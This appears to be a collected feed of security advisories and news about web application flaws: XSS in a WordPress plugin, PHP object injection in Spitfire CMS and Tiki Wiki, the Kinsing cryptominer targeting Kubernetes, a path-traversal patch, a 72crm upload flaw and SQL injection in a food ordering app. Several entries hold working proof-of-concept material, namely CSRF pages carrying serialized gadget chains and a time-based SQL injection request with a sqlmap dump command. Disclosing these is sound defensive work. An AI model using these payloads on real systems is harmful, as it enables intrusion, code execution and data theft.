The CPO Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of its content type settings parameters in versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVE-2023-0162: Diff [2574013:2844012] for cpo-companion/trunk – WordPress Plugin Repository

Spitfire CMS 1.0.475 is vulnerable to PHP Object Injection.

Title: Spitfire CMS 1.0.475 (cms\_backup\_values) PHP Object Injection  
Advisory ID: ZSL-2022-5720  
Type: Local/Remote  
Impact: Manipulation of Data, DoS  
Risk: (4/5)  
Release Date: 09.12.2022

**Summary**

Spitfire is a system to manage the content of webpages.

**Description**

The application is prone to a PHP Object Injection vulnerability due to the unsafe use of unserialize() function. A potential attacker, authenticated, could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input.

**Vendor**

Claus Muus - http://spitfire.clausmuus.de

**Affected Version**

1.0.475

**Tested On**

nginx

**Vendor Status**

\[28.09.2022\] Vulnerability discovered.  
\[28.09.2022\] Vendor contacted.  
\[08.12.2022\] No response from the vendor.  
\[09.12.2022\] Public security advisory released.

**PoC**

spitfirecms\_cookieobjinj.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://packetstormsecurity.com/files/170186/  
\[2\] https://cxsecurity.com/issue/WLB-2022120026

**Changelog**

\[09.12.2022\] - Initial release  
\[10.12.2022\] - Added reference \[1\]  
\[14.12.2022\] - Added reference \[2\]

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

CVE-2022-47083: Zero Science Lab » Spitfire CMS 1.0.475 (cms_backup_values) PHP Object Injection

The cryptomining malware, which typically targets Linux, is exploiting weaknesses in an open source container tool for initial access to cloud environments.

A malware that typically targets Linux environments for cryptocurrency mining has found a new target: vulnerable images and weakly configured PostgreSQL containers in Kubernetes that can be exploited for initial access, Microsoft has found.

Kinsing is a Golang-based malware best known for its targeting of Linux environments, but Microsoft researchers recently observed the Kinsing malware evolving its tactics, Microsoft security researcher Sunders Bruskin divulged in a recently published report. 

Kubernetes, meanwhile, has become the standard open source tool for managing enterprise application deployment mainly because it's cost-effective, offers autoscaling, and can run on any infrastructure. Indeed, 85% of IT leaders consider Kubernetes "extremely important" to cloud-native strategies.

That Kinsing would begin to find new ways to exploit Kubernetes clusters is on brand for the malware, especially because Kubernetes, like the cloud itself, is notoriously difficult to secure. Attackers have found multiple holes in Kubernetes — including the discovery of more than 380,000 open Kubernetes API servers exposed on the Internet — that have made it open season on cloud environments that use the management platform. Threat actors are even using compromised Kubernetes clusters to launch further malicious attacks.

"Exposing the cluster to the Internet without proper security measures can leave it open to attack from external sources," Bruskin acknowledged in the post.

**Targeting Vulnerable Container Images**

One of the new ways Kinsing is targeting Kubernetes environments is by targeting images that are vulnerable to remote code execution (RCE), the researchers found. This allows attackers with network access to exploit the container and run their malicious payload, they said.

In their observations, Microsoft researchers observed several application images frequently infected with Kinsing malware, including PHPUnit, Liferay, Oracle WebLogic, and WordPress, Bruskin wrote.

A series of high-severity vulnerabilities in WebLogic that Oracle revealed in 2020 — CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883 — have become particular targets of attackers wielding the Kinsing malware, which goes after unpatched WebLogic server images, researchers said.

Attacks begin with scanning of a wide range of IP addresses, looking for an open port that matches the WebLogic default port (7001), Bruskin revealed.

"If vulnerable, attackers can use one of the exploits to run their malicious payload (Kinsing, in this case)," he wrote, using a malicious command.

**PostgreSQL in the Crosshairs**

Microsoft researchers also recently observed a significant amount of Kubernetes clusters running PostgreSQL containers that were infected with Kinsing. They attributed the infections to attackers targeting several common misconfigurations that expose these servers, they said.

One is to use the "trust authentication" setting to configure these containers, which means PostgreSQL will assume that anyone who can connect to the server is authorized to access the database with whatever database user name they specify.  
"However, in some cases, this range is wider than it should be or even accepts connections from any IP address (i.e. 0.0.0.0/0)," Bruskin explained in the post. "In such configurations, attackers can freely connect to the PostgreSQL servers without authentication, which may lead to code execution."

Some network configurations in Kubernetes also are prone to Address Resolution Protocol (ARP) poisoning, which allows attackers to impersonate applications in the cluster. This means that even specifying a private IP address in the "trust" configuration may pose a security risk, the researchers said. ARP is the process of connecting a dynamic IP address to a physical machine's MAC address.

Indeed, as a general rule, configuring a PostgreSQL container to allow access to a broad range of IP addresses is exposing it to a potential threat, Bruskin warned.

Even if administrators don't configure it using an unsecured "trust authentication" method, attackers can brute-force PostgreSQL accounts, use denial-of-service (DoS) or distributed DoS (DDoS) attackers on the container's availability, or exploit the container and the database itself to compromise Kubernetes clusters, he wrote.

**Protecting the Enterprise Cloud**

Researchers offered both general rules of thumb for enterprises implementing Kubernetes environments and specific mitigations to avoid exposing them to attacks that target vulnerable images and common PostgreSQL misconfigurations.

In general, security teams must remain aware of exposed containers and vulnerable images and try to mitigate the risk before they are breached, Bruskin advised.

"Regularly updating images and secure configurations can be a game changer for a company when trying to be as protected as possible from security breaches and risky exposure," he wrote.

To mitigate the risk of implementing containers with vulnerable images, organizations can take several steps when deploying an image to the container, the researchers said. The first is to ensure that the image is from a known registry and that it's been patched and updated to the latest version, they said.

Organizations should also scan all images for vulnerabilities, identifying which ones are vulnerable and what those vulnerabilities are, especially the ones that are used in exposed containers. Finally, the researchers said, minimizing access to the container by assigning access to specific IPs and applying the "least privileges" rule to the user can also prevent attackers from exploiting vulnerable images in Kubernetes environments.

Microsoft: Kinsing Targets Kubernetes via Containers, PostgreSQL

A vulnerability has been found in fabarea media_upload and classified as critical. This vulnerability affects the function getUploadedFileList of the file Classes/Service/UploadFileService.php. The manipulation leads to pathname traversal. Upgrading to version 0.9.0 is able to address this issue. The name of the patch is b25d42a4981072321c1a363311d8ea2a4ac8763a. It is recommended to upgrade the affected component. VDB-217786 is the identifier assigned to this vulnerability.

@@ -34,33 +34,35 @@ public function getUploadedFileList($property = '')

\* Return an array of uploaded files, done in a previous step.

\*

\* @param string $property

\* @throws \\Exception

\* @return UploadedFile\[\]

\* @throws \\InvalidArgumentException

\* @throws \\RuntimeException

\*/

public function getUploadedFiles($property = '')

{

  

$files = array();

$uploadedFiles = GeneralUtility::trimExplode(',', $this\->getUploadedFileList($property), TRUE);

  

// Convert uploaded files into array

foreach ($uploadedFiles as $uploadedFileName) {

  

$temporaryFileNameAndPath = UploadManager::UPLOAD\_FOLDER . '/' . $uploadedFileName;

// Protection against directory traversal

$uploadedFileName = str\_replace('..' . DIRECTORY\_SEPARATOR, '', $uploadedFileName);

$temporaryFileNameAndPath = UploadManager::UPLOAD\_FOLDER . DIRECTORY\_SEPARATOR . $uploadedFileName;

  

if (!file\_exists($temporaryFileNameAndPath)) {

$message = sprintf(

'I could not find file "%s". Something went wrong during the upload? Or is it some cache effect?',

$temporaryFileNameAndPath

);

throw new \\Exception($message, 1389550006);

throw new \\RuntimeException($message, 1389550006);

}

$fileSize = round(filesize($temporaryFileNameAndPath) / 1000);

  

/\*\* @var UploadedFile $uploadedFile \*/

$uploadedFile = GeneralUtility::makeInstance(UploadedFile::class);

$uploadedFile\->setTemporaryFileNameAndPath($temporaryFileNameAndPath)

\->setFileName($uploadedFileName)

\->setFileName(basename($uploadedFileName))

\->setSize($fileSize);

  

$files\[\] = $uploadedFile;

CVE-2016-15017: [SECURITY] Prevent directory traversal · fabarea/media_upload@b25d42a

Tiki Wiki CMS Groupware versions 24.1 and below suffer from a PHP object injection vulnerability in tikiimporter_blog_wordpress.php.

**Tiki Wiki CMS Groupware 24.1 tikiimporter\_blog\_wordpress.php PHP Object Injection**

    ----------------------------------------------------------------------------------------------------Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP Object Injection Vulnerability----------------------------------------------------------------------------------------------------[-] Software Link:https://tiki.org[-] Affected Versions:Version 24.1 and prior versions.[-] Vulnerability Description:The vulnerability is located in the /lib/importer/tikiimporter_blog_wordpress.php script. Specifically, when importing data from WordPress sites through the Tiki Importer, user input passed through the uploaded XML file is being used in a call to the unserialize() PHP function. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires an admin account (specifically, the ‘tiki_p_admin_importer’ permission). However, due to the CSRF vulnerability described in KIS-2023-01, this vulnerability might also be exploited by tricking a victim user into opening a web page like the following:<html>  <form action="http://localhost/tiki/tiki-importer.php" method="POST" enctype="multipart/form-data">   <input type="hidden" name="importerClassName" value="TikiImporter_Blog_Wordpress" />   <input type="hidden" name="importAttachments" value="on" />   <input type="file" name="importFile" id="fileinput"/>  </form>  <script>   const xmlContent = atob("PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8cnNzIHZlcnNpb249IjIuMCIgeG1sbnM6d3A9Imh0dHA6Ly93b3JkcHJlc3Mub3JnL2V4cG9ydC8xLjIvIj4KIDxjaGFubmVsPgogIDxpdGVtPgogICA8d3A6cG9zdF90eXBlPmF0dGFjaG1lbnQ8L3dwOnBvc3RfdHlwZT4KICAgPHdwOnBvc3RtZXRhPgogICAgPHdwOm1ldGFfa2V5Pl93cF9hdHRhY2htZW50X21ldGFkYXRhPC93cDptZXRhX2tleT4KICAgIDx3cDptZXRhX3ZhbHVlPjwhW0NEQVRBW086MjU6IlNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb24iOjE6e1M6MzE6IlwwMFNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb25cMDBidWxrIjtPOjI4OiJTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uIjozOntTOjM1OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY291bnQiO2k6MTtTOjM4OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY2FsbGJhY2siO1M6MTQ6ImNhbGxfdXNlcl9mdW5jIjtTOjM2OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwYnVmZmVyIjthOjI6e2k6MDtPOjIyOiJUcmFja2VyX0ZpZWxkX0NvbXB1dGVkIjozOntTOjMyOiJcMDBUcmFja2VyX0ZpZWxkX0Fic3RyYWN0XDAwaXRlbURhdGEiO2E6MTp7Uzo2OiJpdGVtSWQiO2k6MTt9UzozMToiXDAwVHJhY2tlcl9GaWVsZF9BYnN0cmFjdFwwMG9wdGlvbnMiO086MTU6IlRyYWNrZXJfT3B0aW9ucyI6MTp7UzoyMToiXDAwVHJhY2tlcl9PcHRpb25zXDAwZGF0YSI7YToxOntTOjc6ImZvcm11bGEiO1M6MTQ6Im51bGw7cGhwaW5mbygpIjt9fVM6NDE6IlwwMFRyYWNrZXJfRmllbGRfQWJzdHJhY3RcMDB0cmFja2VyRGVmaW5pdGlvbiI7TzoxODoiVHJhY2tlcl9EZWZpbml0aW9uIjowOnt9fWk6MTtTOjEyOiJnZXRGaWVsZERhdGEiO319fV1dPjwvd3A6bWV0YV92YWx1ZT4KICAgPC93cDpwb3N0bWV0YT4KICA8L2l0ZW0+CiA8L2NoYW5uZWw+CjwvcnNzPg==");   const fileInput = document.getElementById("fileinput");   const dataTransfer = new DataTransfer();   const file = new File([xmlContent], "test.xml", {type: "text/xml"});   dataTransfer.items.add(file);   fileInput.files = dataTransfer.files;   document.forms[0].submit();  </script></html>[-] Solution:Upgrade to version 24.2 or later.[-] Disclosure Timeline:[07/03/2022] - Vendor notified[23/08/2022] - Version 24.1 released[09/01/2023] - Public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2023-22851 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:http://karmainsecurity.com/KIS-2023-04

Tiki Wiki CMS Groupware 24.1 tikiimporter_blog_wordpress.php PHP Object Injection

Tiki Wiki CMS Groupware versions 24.0 and below suffers from a PHP object injection vulnerability in grid.php.

    -----------------------------------------------------------------------------Tiki Wiki CMS Groupware <= 24.0 (grid.php) PHP Object Injection Vulnerability-----------------------------------------------------------------------------[-] Software Link:https://tiki.org[-] Affected Versions:Version 24.0 and prior versions.[-] Vulnerability Description:The vulnerability is located in the /lib/sheet/grid.php script, specifically into the TikiSheetSerializeHandler::_load() method, which is using the unserialize() PHP function with user-controlled input. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires the “Spreadsheets” feature to be enabled and an account with permissions to create a new sheet. However, due to the CSRF vulnerability described in KIS-2023-01, this vulnerability might also be exploited by tricking a victim user into opening a web page like the following:<html>  <form action="http://localhost/tiki/tiki-import_sheet.php?sheetId=1" method="POST" enctype="multipart/form-data">   <input type="hidden" name="handler" value="TikiSheetSerializeHandler" />   <input type="file" name="file" id="fileinput"/>  </form>  <script>   const popChain = 'O:25:"Search_Elastic_Connection":1:{S:31:"\00Search_Elastic_Connection\00bulk";O:28:"Search_Elastic_BulkOperation":3:{S:35:"\00Search_Elastic_BulkOperation\00count";i:1;S:38:"\00Search_Elastic_BulkOperation\00callback";S:14:"call_user_func";S:36:"\00Search_Elastic_BulkOperation\00buffer";a:2:{i:0;O:22:"Tracker_Field_Computed":3:{S:32:"\00Tracker_Field_Abstract\00itemData";a:1:{S:6:"itemId";i:1;}S:31:"\00Tracker_Field_Abstract\00options";O:15:"Tracker_Options":1:{S:21:"\00Tracker_Options\00data";a:1:{S:7:"formula";S:14:"null;phpinfo()";}}S:41:"\00Tracker_Field_Abstract\00trackerDefinition";O:18:"Tracker_Definition":0:{}}i:1;S:12:"getFieldData";}}}';   const fileInput = document.getElementById("fileinput");   const dataTransfer = new DataTransfer();   const file = new File([popChain], "test");   dataTransfer.items.add(file);   fileInput.files = dataTransfer.files;   document.forms[0].submit();  </script></html>[-] Solution:Upgrade to version 24.1 or later.[-] Disclosure Timeline:[07/03/2022] - Vendor notified[23/08/2022] - Version 24.1 released[09/01/2023] - Public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2023-22850 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:http://karmainsecurity.com/KIS-2023-03

Tiki Wiki CMS Groupware 24.0 grid.php PHP Object Injection

72crm v9 was discovered to contain an arbitrary file upload vulnerability via the avatar upload function. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

****Brief of this vulnerability****

72crm v9 has Arbitrary file upload vulnerability Where to upload the avatar

****Test Environment****

*   Windows10
*   PHP 5.6.9+Apache/2.4.39

****Affect version****

72crm v9

****Vulnerable Code****

application\\admin\\controller\\Users.php line 259  
  
After follow-up, it was found that the validate was not set, and the move operation was performed directly, resulting in the ability to upload any file  
  
follow-up move function（set filename）  
line 352:  
  
follow up function  
Generate time-based file names with php as a suffix  
  
then move\_uploaded\_file with this filename （thinkphp\\library\\think\\File.php line 369）  

****Vulnerability display****

First enter the background  
Click as shown,go to the Enterprise management background  
  
Click to change avatar  
  
Capture the packet and modify the content as follows  
  
Although it is judged as an illegal file, the file has been uploaded successfully, and the file path will be exposed when the debug mode is turned on  
  
  
getshell  
  
note：  
Even if debug is not turned on, the file name can be blasted out through the file name naming rules

CVE-2022-46610: 72crm v9 has Arbitrary file upload vulnerability in the avatar upload · Issue #36 · 72wukong/72crm-9.0-PHP

Tiki Wiki CMS Groupware versions 24.0 and below suffer from a PHP code injection vulnerability in structlib.php.

    --------------------------------------------------------------------------------Tiki Wiki CMS Groupware <= 24.0 (structlib.php) PHP Code Injection Vulnerability--------------------------------------------------------------------------------[-] Software Link:https://tiki.org[-] Affected Versions:Version 24.0 and prior versions.[-] Vulnerability Description:The vulnerability is located in the /lib/structures/structlib.php script, specifically in the StructLib::structure_to_webhelp() method, which is using an eval() call with user-controlled input. This can be exploited by malicious users to inject and execute arbitrary PHP code. Successful exploitation of this vulnerability requires the “feature_create_webhelp” to be enabled and an account with permissions to create a wiki page.[-] Solution:Upgrade to version 24.1 or later.[-] Disclosure Timeline:[08/03/2022] - Vendor notified[23/08/2022] - Version 24.1 released[09/01/2023] - Public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2023-22853 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:http://karmainsecurity.com/KIS-2023-02

Tiki Wiki CMS Groupware 24.0 structlib.php Code Execution

Tiki Wiki CMS Groupware versions 25.0 and below suffer from multiple cross site request forgery vulnerabilities.

------------------------------------------------------------------------------  
Tiki Wiki CMS Groupware <= 25.0 Two Cross-Site Request Forgery   
Vulnerabilities  
------------------------------------------------------------------------------

[-] Software Link:

https://tiki.org

[-] Affected Versions:

Version 25.0 and prior versions.

[-] Vulnerabilities Description:

1) The /tiki-importer.php script does not implement any protection   
against Cross-Site Request Forgery (CSRF) attacks. As such, an attacker   
might force an authenticated user to import arbitrary content (wiki   
pages) into TikiWiki by tricking a victim user into browsing to a   
specially crafted web page.

2) The /tiki-import_sheet.php script does not implement any protection   
against Cross-Site Request Forgery (CSRF) attacks. As such, an attacker   
might force an authenticated user to import arbitrary sheets into   
TikiWiki by tricking a victim user into browsing to a specially crafted   
web page. Successful exploitation of this vulnerability requires the   
“Spreadsheets” feature to be enabled.

[-] Solution:

No official solution is currently available.

[-] Disclosure Timeline:

[06/03/2022] - Vendor notified  
[09/01/2023] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2023-22852 to this vulnerability.

[-] Credits:

Vulnerabilities discovered by Egidio Romano.

[-] Original Advisory:

http://karmainsecurity.com/KIS-2023-01

Tiki Wiki CMS Groupware 25.0 Cross Site Request Forgery

Online Food Ordering System version 2.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Food Ordering System v2 - Sql Injection (Time-Based Blind)# Date: 01/10/2023# Exploit Author: Anıl Kızıltan# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code# Version: 2.0 # Tested on: Macos / XAMPP# username parameter is vulnerable to sql injection. You can exploit this sqlmap command: (First save this raw request as req.txt)# sqlmap -r req.txt -p username --dump-all####### Raw Request #######POST /fos/admin/ajax.php?action=login HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 32Origin: http://localhostConnection: closeReferer: http://localhost/fos/admin/login.phpCookie: language=en; welcomebanner_status=dismiss; continueCode=LoPJXWEAqruytmUYHrT4FDiBZikOH1Vh8Zh7JHvLtppI9VCvXHEYd7ywQ1B5; cookieconsent_status=dismiss; PHPSESSID=eje1menuonpvjtfbl2ri965btkSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originusername='-sleep(1)-'&password=a

Tag

#php